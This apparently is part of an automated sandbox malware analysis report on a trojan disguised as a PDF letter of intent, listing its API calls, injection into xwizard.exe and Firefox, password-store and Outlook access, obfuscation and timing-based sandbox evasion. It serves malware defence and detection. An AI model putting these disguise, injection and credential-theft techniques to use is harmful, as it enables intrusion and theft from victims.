            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FD3010 NtOpenDirectoryObject,2_2_32FD3010
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FD39B0 NtGetContextThread,2_2_32FD39B0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FD3D70 NtOpenThread,2_2_32FD3D70
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FD3D10 NtOpenProcessToken,2_2_32FD3D10
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FD4340 NtSetContextThread,2_2_32FD4340
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FD4650 NtSuspendThread,2_2_32FD4650
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FD2AF0 NtWriteFile,2_2_32FD2AF0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FD2AD0 NtReadFile,2_2_32FD2AD0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FD2AB0 NtWaitForSingleObject,2_2_32FD2AB0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FD2BF0 NtAllocateVirtualMemory,2_2_32FD2BF0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FD2BE0 NtQueryValueKey,2_2_32FD2BE0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FD2BA0 NtEnumerateValueKey,2_2_32FD2BA0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe Code function: 2_2_32FD2B80 NtQueryInformationFile,2_2_32FD2B80
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe Code function: 2_2_32FD2B60 NtClose,2_2_32FD2B60
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe Code function: 2_2_32FD2EE0 NtQueueApcThread,2_2_32FD2EE0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe Code function: 2_2_32FD2EA0 NtAdjustPrivilegesToken,2_2_32FD2EA0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe Code function: 2_2_32FD2E80 NtReadVirtualMemory,2_2_32FD2E80
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe Code function: 2_2_32FD2E30 NtWriteVirtualMemory,2_2_32FD2E30
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe Code function: 2_2_32FD2FE0 NtCreateFile,2_2_32FD2FE0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe Code function: 2_2_32FD2FB0 NtResumeThread,2_2_32FD2FB0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe Code function: 2_2_32FD2FA0 NtQuerySection,2_2_32FD2FA0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe Code function: 2_2_32FD2F90 NtProtectVirtualMemory,2_2_32FD2F90
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe Code function: 2_2_32FD2F60 NtCreateProcessEx,2_2_32FD2F60
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe Code function: 2_2_32FD2F30 NtCreateSection,2_2_32FD2F30
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe Code function: 2_2_32FD2CF0 NtOpenProcess,2_2_32FD2CF0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe Code function: 2_2_32FD2CC0 NtQueryVirtualMemory,2_2_32FD2CC0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe Code function: 2_2_32FD2CA0 NtQueryInformationToken,2_2_32FD2CA0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe Code function: 2_2_32FD2C60 NtCreateKey,2_2_32FD2C60
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe Code function: 2_2_32FD2C00 NtQueryInformationProcess,2_2_32FD2C00
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe Code function: 2_2_32FD2DD0 NtDelayExecution,2_2_32FD2DD0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe Code function: 2_2_32FD2DB0 NtEnumerateKey,2_2_32FD2DB0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe Code function: 2_2_32FD2D30 NtUnmapViewOfSection,2_2_32FD2D30
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe Code function: 2_2_32FD2D10 NtMapViewOfSection,2_2_32FD2D10
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe Code function: 2_2_32FD2D00 NtSetInformationFile,2_2_32FD2D00
            Source: C:\Windows\SysWOW64\xwizard.exe Code function: 6_2_047D4650 NtSuspendThread,LdrInitializeThunk,6_2_047D4650
            Source: C:\Windows\SysWOW64\xwizard.exe Code function: 6_2_047D4340 NtSetContextThread,LdrInitializeThunk,6_2_047D4340
            Source: C:\Windows\SysWOW64\xwizard.exe Code function: 6_2_047D2C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_047D2C70
            Source: C:\Windows\SysWOW64\xwizard.exe Code function: 6_2_047D2C60 NtCreateKey,LdrInitializeThunk,6_2_047D2C60
            Source: C:\Windows\SysWOW64\xwizard.exe Code function: 6_2_047D2CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_047D2CA0
            Source: C:\Windows\SysWOW64\xwizard.exe Code function: 6_2_047D2D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_047D2D30
            Source: C:\Windows\SysWOW64\xwizard.exe Code function: 6_2_047D2D10 NtMapViewOfSection,LdrInitializeThunk,6_2_047D2D10
            Source: C:\Windows\SysWOW64\xwizard.exe Code function: 6_2_047D2DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_047D2DF0
            Source: C:\Windows\SysWOW64\xwizard.exe Code function: 6_2_047D2DD0 NtDelayExecution,LdrInitializeThunk,6_2_047D2DD0
            Source: C:\Windows\SysWOW64\xwizard.exe Code function: 6_2_047D2EE0 NtQueueApcThread,LdrInitializeThunk,6_2_047D2EE0
            Source: C:\Windows\SysWOW64\xwizard.exe Code function: 6_2_047D2E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_047D2E80
            Source: C:\Windows\SysWOW64\xwizard.exe Code function: 6_2_047D2F30 NtCreateSection,LdrInitializeThunk,6_2_047D2F30
            Source: C:\Windows\SysWOW64\xwizard.exe Code function: 6_2_047D2FE0 NtCreateFile,LdrInitializeThunk,6_2_047D2FE0
            Source: C:\Windows\SysWOW64\xwizard.exe Code function: 6_2_047D2FB0 NtResumeThread,LdrInitializeThunk,6_2_047D2FB0
            Source: C:\Windows\SysWOW64\xwizard.exe Code function: 6_2_047D2AF0 NtWriteFile,LdrInitializeThunk,6_2_047D2AF0
            Source: C:\Windows\SysWOW64\xwizard.exe Code function: 6_2_047D2AD0 NtReadFile,LdrInitializeThunk,6_2_047D2AD0
            Source: C:\Windows\SysWOW64\xwizard.exe Code function: 6_2_047D2B60 NtClose,LdrInitializeThunk,6_2_047D2B60
            Source: C:\Windows\SysWOW64\xwizard.exe Code function: 6_2_047D2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_047D2BF0
            Source: C:\Windows\SysWOW64\xwizard.exe Code function: 6_2_047D2BE0 NtQueryValueKey,LdrInitializeThunk,6_2_047D2BE0
            Source: C:\Windows\SysWOW64\xwizard.exe Code function: 6_2_047D2BA0 NtEnumerateValueKey,LdrInitializeThunk,6_2_047D2BA0
            Source: C:\Windows\SysWOW64\xwizard.exe Code function: 6_2_047D35C0 NtCreateMutant,LdrInitializeThunk,6_2_047D35C0
            Source: C:\Windows\SysWOW64\xwizard.exe Code function: 6_2_047D39B0 NtGetContextThread,LdrInitializeThunk,6_2_047D39B0
            Source: C:\Windows\SysWOW64\xwizard.exe Code function: 6_2_047D2C00 NtQueryInformationProcess,6_2_047D2C00
            Source: C:\Windows\SysWOW64\xwizard.exe Code function: 6_2_047D2CF0 NtOpenProcess,6_2_047D2CF0
            Source: C:\Windows\SysWOW64\xwizard.exe Code function: 6_2_047D2CC0 NtQueryVirtualMemory,6_2_047D2CC0
            Source: C:\Windows\SysWOW64\xwizard.exe Code function: 6_2_047D2D00 NtSetInformationFile,6_2_047D2D00
            Source: C:\Windows\SysWOW64\xwizard.exe Code function: 6_2_047D2DB0 NtEnumerateKey,6_2_047D2DB0
            Source: C:\Windows\SysWOW64\xwizard.exe Code function: 6_2_047D2E30 NtWriteVirtualMemory,6_2_047D2E30
            Source: C:\Windows\SysWOW64\xwizard.exe Code function: 6_2_047D2EA0 NtAdjustPrivilegesToken,6_2_047D2EA0
            Source: C:\Windows\SysWOW64\xwizard.exe Code function: 6_2_047D2F60 NtCreateProcessEx,6_2_047D2F60
            Source: C:\Windows\SysWOW64\xwizard.exe Code function: 6_2_047D2FA0 NtQuerySection,6_2_047D2FA0
            Source: C:\Windows\SysWOW64\xwizard.exe Code function: 6_2_047D2F90 NtProtectVirtualMemory,6_2_047D2F90
            Source: C:\Windows\SysWOW64\xwizard.exe Code function: 6_2_047D2AB0 NtWaitForSingleObject,6_2_047D2AB0
            Source: C:\Windows\SysWOW64\xwizard.exe Code function: 6_2_047D2B80 NtQueryInformationFile,6_2_047D2B80
            Source: C:\Windows\SysWOW64\xwizard.exe Code function: 6_2_047D3010 NtOpenDirectoryObject,6_2_047D3010
            Source: C:\Windows\SysWOW64\xwizard.exe Code function: 6_2_047D3090 NtSetValueKey,6_2_047D3090
            Source: C:\Windows\SysWOW64\xwizard.exe Code function: 6_2_047D3D70 NtOpenThread,6_2_047D3D70
            Source: C:\Windows\SysWOW64\xwizard.exe Code function: 6_2_047D3D10 NtOpenProcessToken,6_2_047D3D10
            Source: C:\Windows\SysWOW64\xwizard.exe Code function: 6_2_028C92D0 NtCreateFile,6_2_028C92D0
            Source: C:\Windows\SysWOW64\xwizard.exe Code function: 6_2_028C9720 NtAllocateVirtualMemory,6_2_028C9720
            Source: C:\Windows\SysWOW64\xwizard.exe Code function: 6_2_028C9430 NtReadFile,6_2_028C9430
            Source: C:\Windows\SysWOW64\xwizard.exe Code function: 6_2_028C95C0 NtClose,6_2_028C95C0
            Source: C:\Windows\SysWOW64\xwizard.exe Code function: 6_2_028C9520 NtDeleteFile,6_2_028C9520
            Source: C:\Windows\SysWOW64\xwizard.exe Code function: 6_2_04ABF0A1 NtQueryInformationProcess,6_2_04ABF0A1
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe Code function: 0_2_004031DD EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,ExitProcess,0_2_004031DD
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: String function: 0481F290 appears 103 times
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: String function: 047E7E54 appears 107 times
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: String function: 0478B970 appears 262 times
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: String function: 047D5130 appears 58 times
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: String function: 0480EA12 appears 86 times
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: String function: 32FE7E54 appears 100 times
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: String function: 32F8B970 appears 262 times
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: String function: 3300EA12 appears 86 times
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: String function: 32FD5130 appears 58 times
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: String function: 3301F290 appears 105 times
            Source: Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000000.00000002.1949388962.000000000045D000.00000002.00000001.01000000.00000003.sdmp - Binary or memory string: OriginalFilenameterrorist sumpegnene.exeDVarFileInfo$ vs Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe
            Source: Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000003.2315947683.0000000002D21000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: OriginalFilenamexwizard.exej% vs Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe
            Source: Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000003.2316042059.0000000002D2E000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: OriginalFilenamexwizard.exej% vs Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe
            Source: Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000003.2254898946.0000000032EE5000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: OriginalFilenamentdll.dllj% vs Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe
            Source: Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000002.2383505236.0000000033231000.00000040.00001000.00020000.00000000.sdmp - Binary or memory string: OriginalFilenamentdll.dllj% vs Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe
            Source: Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000003.2252886370.0000000032D2F000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: OriginalFilenamentdll.dllj% vs Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe
            Source: Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000000.1946731635.000000000045D000.00000002.00000001.01000000.00000003.sdmp - Binary or memory string: OriginalFilenameterrorist sumpegnene.exeDVarFileInfo$ vs Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe
            Source: Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe - Binary or memory string: OriginalFilenameterrorist sumpegnene.exeDVarFileInfo$ vs Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe
            Source: Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe - Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engine - Classification label: mal100.troj.spyw.evad.winEXE@7/14@6/6
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe - Code function: 0_2_00404430 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 0_2_00404430
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe - Code function: 0_2_0040206A CoCreateInstance, 0_2_0040206A
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe - File created: C:\Users\user\Chiliahedron.lnk
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe - File created: C:\Users\user\AppData\Local\Temp\nsi7130.tmp
            Source: Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe - Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe - File read: C:\Users\desktop.ini
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe - Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: xwizard.exe, 00000006.00000003.2531025886.0000000002AF6000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000006.00000002.3107060521.0000000002AF6000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000006.00000003.2531843480.0000000002AF6000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe - ReversingLabs: Detection: 42%
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe - File read: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe
            Source: unknown - Process created: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe "C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe"
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe - Process created: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe "C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe"
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe - Process created: C:\Windows\SysWOW64\xwizard.exe "C:\Windows\SysWOW64\xwizard.exe"
            Source: C:\Windows\SysWOW64\xwizard.exe - Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe - Section loaded: apphelp.dll, version.dll, kernel.appcore.dll, uxtheme.dll, shfolder.dll, windows.storage.dll, wldp.dll, propsys.dll, riched20.dll, usp10.dll, msls31.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll, wintypes.dll, textshaping.dll, profapi.dll, iertutil.dll, sspicli.dll, powrprof.dll, winhttp.dll, wkscli.dll, netutils.dll, umpdc.dll, wininet.dll, ondemandconnroutehelper.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, urlmon.dll, srvcli.dll, dnsapi.dll, rasadhlp.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, msasn1.dll, dpapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, gpapi.dll, ncrypt.dll, ncryptsslp.dll
            Source: C:\Windows\SysWOW64\xwizard.exe - Section loaded: wininet.dll, kernel.appcore.dll, uxtheme.dll, ieframe.dll, iertutil.dll, netapi32.dll, version.dll, userenv.dll, winhttp.dll, wkscli.dll, netutils.dll, sspicli.dll, windows.storage.dll, wldp.dll, profapi.dll, secur32.dll, mlang.dll, propsys.dll, winsqlite3.dll, vaultcli.dll, wintypes.dll, dpapi.dll, cryptbase.dll
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe - Section loaded: wininet.dll, mswsock.dll, dnsapi.dll, iphlpapi.dll, fwpuclnt.dll, rasadhlp.dll
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe - Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe - File written: C:\Users\user\AppData\Local\Temp\tmc.ini
            Source: C:\Windows\SysWOW64\xwizard.exe - Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: Binary string: mshtml.pdb source: Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000001.1949040328.0000000000649000.00000020.00000001.01000000.00000008.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ybjXXpYwhPHZD.exe, 00000005.00000002.3107024135.00000000006EE000.00000002.00000001.01000000.0000000A.sdmp, ybjXXpYwhPHZD.exe, 00000007.00000002.3106981368.00000000006EE000.00000002.00000001.01000000.0000000A.sdmp
            Source: Binary string: wntdll.pdbUGP source: Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000003.2254898946.0000000032DB8000.00000004.00000020.00020000.00000000.sdmp, Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp, Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000003.2252886370.0000000032C0C000.00000004.00000020.00020000.00000000.sdmp, Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, xwizard.exe, 00000006.00000003.2349818754.00000000043F2000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000006.00000002.3108227033.00000000048FE000.00000040.00001000.00020000.00000000.sdmp, xwizard.exe, 00000006.00000003.2352861018.00000000045AD000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000006.00000002.3108227033.0000000004760000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000003.2254898946.0000000032DB8000.00000004.00000020.00020000.00000000.sdmp, Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp, Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000003.2252886370.0000000032C0C000.00000004.00000020.00020000.00000000.sdmp, Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, xwizard.exe, xwizard.exe, 00000006.00000003.2349818754.00000000043F2000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000006.00000002.3108227033.00000000048FE000.00000040.00001000.00020000.00000000.sdmp, xwizard.exe, 00000006.00000003.2352861018.00000000045AD000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000006.00000002.3108227033.0000000004760000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: xwizard.pdb source: Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000003.2315947683.0000000002D21000.00000004.00000020.00020000.00000000.sdmp, Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000003.2316042059.0000000002D2E000.00000004.00000020.00020000.00000000.sdmp, ybjXXpYwhPHZD.exe, 00000005.00000002.3107515922.0000000000CE8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mshtml.pdbUGP source: Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000001.1949040328.0000000000649000.00000020.00000001.01000000.00000008.sdmp
            Source: Binary string: xwizard.pdbGCTL source: Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000003.2315947683.0000000002D21000.00000004.00000020.00020000.00000000.sdmp, Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000003.2316042059.0000000002D2E000.00000004.00000020.00020000.00000000.sdmp, ybjXXpYwhPHZD.exe, 00000005.00000002.3107515922.0000000000CE8000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            Source: Yara match - File source: Process Memory Space: Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe PID: 6876, type: MEMORYSTR
            Source: Yara match - File source: 00000000.00000002.1950807727.0000000004D63000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe - Code function: 0_2_004060B0 GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_004060B0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe - Code function:
                0_2_10002D50 push eax; ret 0_2_10002D7E
                2_2_32F61368 push eax; iretd 2_2_32F61369
                2_2_32F6225F pushad; ret 2_2_32F627F9
                2_2_32F627FA pushad; ret 2_2_32F627F9
                2_2_32F6283D push eax; iretd 2_2_32F62858
                2_2_32F909AD push ecx; mov dword ptr [esp], ecx 2_2_32F909B6
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe - Code function:
                5_2_05503F5D push ss; retf 5_2_05503F76
                5_2_054FAF90 push eax; retf 5_2_054FAF91
                5_2_055017A0 push BD1E4A2Bh; ret 5_2_055017A7
                5_2_05505E22 push edi; ret 5_2_05505E3F
                5_2_055086FA push ds; retf 5_2_05508735
                5_2_055086E5 push ds; retf 5_2_05508735
                5_2_0550C94D push edi; retf 5_2_0550C951
                5_2_055059AD push cs; retf 5_2_055059AE
                5_2_05507050 push ss; iretd 5_2_05507053
                5_2_054FF8B8 push 79675D9Eh; retf 5_2_054FF8BE
                5_2_05500390 push ds; ret 5_2_05500391
                5_2_055002AC push es; retf 5_2_055002AE
            Source: C:\Windows\SysWOW64\xwizard.exe - Code function:
                6_2_047627FA pushad; ret 6_2_047627F9
                6_2_0476225F pushad; ret 6_2_047627F9
                6_2_0476283D push eax; iretd 6_2_04762858
                6_2_047909AD push ecx; mov dword ptr [esp], ecx 6_2_047909B6
                6_2_028B785E push ds; retf 6_2_028B783B
                6_2_028B6156 push ss; iretd 6_2_028B6159
                6_2_028BC64F push eax; ret 6_2_028BC651
                6_2_028B4AB3 push cs; retf 6_2_028B4AB4
                6_2_028B08A6 push BD1E4A2Bh; ret 6_2_028B08AD
                6_2_028AE9BE push 79675D9Eh; retf 6_2_028AE9C4
                6_2_028C0E11 push ebx; iretd 6_2_028C0E13
                6_2_028B4F28 push edi; ret 6_2_028B4F45
                6_2_028AF3B2 push es; retf 6_2_028AF3B4
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe - File created: \letter of intent (loi) for the company november 2024 pdf.pif.exe
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe - File created: C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp\System.dll
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe - Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\xwizard.exe - Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe; RDTSC instruction interceptor: First address: 514548E, second address: 514548E; instructions: 0x00000000 rdtsc; 0x00000002 test edx, eax; 0x00000004 cmp ebx, ecx; 0x00000006 jc 00007F257CDBEE2Ah; 0x00000008 test ch, 00000007h; 0x0000000b cmp di, AE34h; 0x00000010 inc ebp; 0x00000011 cmp ax, bx; 0x00000014 inc ebx; 0x00000015 cmp bx, ax; 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe; RDTSC instruction interceptor: First address: 25A548E, second address: 25A548E; instructions: 0x00000000 rdtsc; 0x00000002 test edx, eax; 0x00000004 cmp ebx, ecx; 0x00000006 jc 00007F257C72A55Ah; 0x00000008 test ch, 00000007h; 0x0000000b cmp di, AE34h; 0x00000010 inc ebp; 0x00000011 cmp ax, bx; 0x00000014 inc ebx; 0x00000015 cmp bx, ax; 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe; Code function: 2_2_3300D1C0 rdtsc
            Source: C:\Windows\SysWOW64\xwizard.exe; Window / User API: threadDelayed 1172
            Source: C:\Windows\SysWOW64\xwizard.exe; Window / User API: threadDelayed 8800
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp\System.dll
